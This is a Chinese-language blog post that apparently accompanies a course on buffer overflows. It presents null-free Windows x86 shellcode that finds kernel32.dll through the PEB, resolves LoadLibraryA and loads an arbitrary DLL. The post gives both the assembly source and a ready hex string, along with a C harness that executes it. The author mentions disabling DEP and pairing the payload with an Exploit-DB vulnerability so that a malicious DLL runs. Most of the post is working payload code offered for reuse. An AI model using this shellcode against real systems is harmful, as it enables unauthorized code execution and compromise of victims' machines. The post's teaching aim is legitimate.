---
layout: post
title: Windows x86 LoadLibraryA Shellcode（Null-Free）
date: '2017-09-29T10:48:00.000-07:00'
author: 聖豪馬
tags:
- BOF
- Shellcode
- Windows
- ASM
modified_time: '2017-09-29T10:48:10.554-07:00'
thumbnail: https://2.bp.blogspot.com/-LTE2NzEEUP4/Wc6GatyXCGI/AAAAAAAAIYI/SKNP6_axawANjkZuUuNF_cO8H55aOTYwQCLcBGAs/s72-c/%25E8%259E%25A2%25E5%25B9%2595%25E5%25BF%25AB%25E7%2585%25A7%2B2017-09-30%2B%25E4%25B8%258A%25E5%258D%25881.41.16.png
blogger_id: tag:blogger.com,1999:blog-1335849442109808564.post-6431850252610208826
blogger_orig_url: http://helloadr.blogspot.com/2017/09/windows-x86-loadlibrarya-shellcodenull.html
---

<h3>murmur</h3>因為部分課程緣故需要展示 Buffer Overflow 可以幹嘛，但是不想包太長的 Shellcode、單純 Demo 彈小算盤好像又太弱了XD。所以拿網路上別人寫好的 Shellcode 小改了一下，分享出來原始 Assembly Code 方便之後有需要的人可以做修改、開發自己的 Shellcode。<br /><br /><h4>Cheat Engine AutoASM 腳本</h4><pre class="prettyprint">// windows x86 LoadLibraryA("xxx.dll")<br />// author: aaaddress1@chroot.org<br />alloc(script, 1024)<br /><br />script:<br />xor edx,edx<br />mov dl,30<br />mov edx,fs:[edx]<br />mov edx,[edx+0C]<br />mov edx,[edx+1C]<br />mov eax,[edx+08]<br />mov esi,[edx+20]<br />mov edx,[edx]<br />cmp byte ptr [esi+0C], 33 /* kernel'3'2.dll -&gt; 0x33 */<br />db 75 f2 // jne -0x0d<br /><br />mov    edi,eax //eax = handle of kernel32.dll<br />add    edi,DWORD PTR [eax+0x3c]<br />mov    edx,DWORD PTR [edi+0x78]<br />add    edx,eax<br />mov    edi,DWORD PTR [edx+0x20]<br />add    edi,eax<br />xor    ebp,ebp<br />mov    esi,DWORD PTR [edi+ebp*4]<br />add    esi,eax<br />inc    ebp<br />//esi = API name<br />cmp    DWORD PTR [esi],0x64616f4c<br />db 75 f2<br />cmp    DWORD PTR [esi+0x8],0x41797261<br />db 75 e9<br /><br />mov    edi,DWORD PTR [edx+0x24]<br />add    edi,eax<br />mov    bp,WORD PTR [edi+ebp*2] //bp = index<br /><br />mov    edi,DWORD PTR [edx+0x1c]<br />add    edi,eax // Export Table: uint32_t Address[]<br /><br />mov    edi,[edi+ebp*4-04]<br />add    edi,eax // Address of LoadLibraryA = edi<br /><br />push 0x7f6c6c64 // dll\x20<br />push 0x2e787878 // xxx.<br />xor dword ptr [esp+07],0x7f<br />push esp<br />call edi<br /></pre><h3>HEX Shellcode</h3><div>當然大部分人應該沒那個需求要小改，<br />純粹 Demo 的話可以參考下面我已經幫你轉好的十六進位 Shellcode 字串直接使用：<br /><br /><pre class="prettyprint">// LoadLibraryA Shellcode Null-Free<br />// Author: aaaddress1@chroot.org<br />int main(void) {<br /> <br /> char shellcode[] =<br />  "\x31\xD2\xB2\x30\x64\x8B\x12\x8B" \<br />  "\x52\x0C\x8B\x52\x1C\x8B\x42\x08" \<br />  "\x8B\x72\x20\x8B\x12\x80\x7E\x0C" \<br />  "\x33\x75\xF2\x8B\xF8\x03\x78\x3C" \<br />  "\x8B\x57\x78\x01\xC2\x8B\x7A\x20" \<br />  "\x01\xC7\x31\xED\x8B\x34\xAF\x01" \<br />  "\xC6\x45\x81\x3E\x4C\x6F\x61\x64" \<br />  "\x75\xF2\x81\x7E\x08\x61\x72\x79" \<br />  "\x41\x75\xE9\x8B\x7A\x24\x01\xC7" \<br />  "\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01" \<br />  "\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68" \<br />  "\x64\x6C\x6C\x7F\x68\x78\x78\x78" \<br />  "\x2E\x83\x74\x24\x07\x7F\x54\xFF" \<br />  "\xD7";<br />  <br /> printf("length: %i\n", strlen(shellcode));<br /> ((void(*)())shellcode)();<br />}<br /></pre></div>上面的程式碼存成 *.cpp 拿個隨便編譯器跑起來會像下面這樣<br />（喔對，記得 DEP 要關喔）<br /><div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-LTE2NzEEUP4/Wc6GatyXCGI/AAAAAAAAIYI/SKNP6_axawANjkZuUuNF_cO8H55aOTYwQCLcBGAs/s1600/%25E8%259E%25A2%25E5%25B9%2595%25E5%25BF%25AB%25E7%2585%25A7%2B2017-09-30%2B%25E4%25B8%258A%25E5%258D%25881.41.16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="764" data-original-width="744" height="320" src="https://2.bp.blogspot.com/-LTE2NzEEUP4/Wc6GatyXCGI/AAAAAAAAIYI/SKNP6_axawANjkZuUuNF_cO8H55aOTYwQCLcBGAs/s320/%25E8%259E%25A2%25E5%25B9%2595%25E5%25BF%25AB%25E7%2585%25A7%2B2017-09-30%2B%25E4%25B8%258A%25E5%258D%25881.41.16.png" width="311" /></a></div><br /></div><h3>效果</h3><br />底下是我拿 2016 隨便一個 Exploit-DB 上挖來的漏洞小改一下，大概像這樣XD<br />Shellcode 觸發後會去載入 xxx.dll，就可以在 DLL 內塞髒東西跑起來啦。<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-fjH061cLbrg/Wc6Bn4dHVhI/AAAAAAAAIX4/xOC4QvZOYXMU0sSjq-4jDliUzgzyVO1nQCLcBGAs/s1600/%25E8%259E%25A2%25E5%25B9%2595%25E5%25BF%25AB%25E7%2585%25A7%2B2017-09-30%2B%25E4%25B8%258A%25E5%258D%25881.23.00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="738" data-original-width="986" height="239" src="https://4.bp.blogspot.com/-fjH061cLbrg/Wc6Bn4dHVhI/AAAAAAAAIX4/xOC4QvZOYXMU0sSjq-4jDliUzgzyVO1nQCLcBGAs/s320/%25E8%259E%25A2%25E5%25B9%2595%25E5%25BF%25AB%25E7%2585%25A7%2B2017-09-30%2B%25E4%25B8%258A%25E5%258D%25881.23.00.png" width="320" /></a></div><div><br /></div>